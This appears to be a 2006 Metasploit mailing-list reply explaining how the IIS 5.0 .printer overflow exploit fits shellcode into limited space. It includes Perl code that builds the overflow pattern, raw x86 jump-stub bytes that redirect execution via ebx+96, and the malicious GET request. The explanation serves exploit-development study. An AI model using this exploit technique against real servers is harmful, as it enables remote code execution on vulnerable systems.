iis50_printer_overflow

[hdm at metasploit.com (H D Moore)]

On Thursday 02 March 2006 14:49, Sonixxfx wrote:
> I am trying to write an exploit for the "iis50_printer_overflow"
[ snip ]
> The problem seems to be that I have few space available after the
> return address for the payload. I believe there is something about 240
> bytes available. So my question is how can I make use of both the space
> available after the return address but also before the return address?

If you look at our exploit, we cheat. We stick our shellcode into the 
query string and then find it again by dereferencing ebx+96 (which 
happens to be a pointer, that when has 256+64 added to it, leads back 
into our shellcode):

my $pattern = $self->MakeNops(280);
substr($pattern, 268, 4, pack("V", $target->[1]));

# payload is at: [ebx + 96] + 256 + 64
$pattern .= "\x8b\x4b\x60";         # mov ecx, [ebx + 96]
$pattern .= "\x80\xc1\x40";         # add cl, 64
$pattern .= "\x80\xc5\x01";         # add ch, 1
$pattern .= "\xff\xe1";             # jmp ecx

my $request = "GET http://$pattern/null.printer?$shellcode...


> B.t.w. Nice looking man this morning on your website Metasploit ;)
That lovely image appears if you browse the web site with a hostname that 
doesn't appear to be 'metasploit.com' or one of our other domains. Let me 
know what URL you used to access the web site - it could be a bug. The 
purpose is to prevent people from hotlinking to images we host on our 
server. 

-HD